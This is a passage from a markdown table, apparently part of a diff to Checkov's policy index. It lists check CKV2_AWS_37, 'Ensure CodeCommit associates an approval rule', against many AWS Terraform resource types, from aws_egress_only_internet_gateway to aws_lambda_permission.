CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 791 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 792 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 793 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 794 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 795 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 796 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 797 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 798 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 799 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 800 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 801 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 802 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 803 | 
CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 804 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 805 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 806 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 807 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 808 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 809 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 810 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 811 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 812 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 813 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 814 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 815 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 816 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 817 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 818 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 819 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 820 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 821 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 822 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 823 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 824 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 825 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 826 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 827 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 828 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 829 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 830 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 831 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 832 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 833 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 834 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 835 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 836 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 837 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 838 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 839 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 840 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 841 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 842 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 843 | CKV2_AWS_37 | resource 
| aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 844 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 845 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 846 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 847 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 848 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 849 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| +| 850 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 851 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 852 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 853 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 854 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 855 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 856 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 857 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 858 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 859 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 860 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 861 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 862 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 863 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 864 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 865 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 866 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 867 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 868 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 869 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 870 
| CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 871 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 872 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 873 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 874 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 875 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 876 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 877 | 
CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 878 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 879 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 880 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 881 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 882 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 883 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 884 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 885 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 886 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 887 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 888 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 889 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 890 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 891 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 892 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 893 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 894 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 895 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 896 | CKV2_AWS_37 | resource | 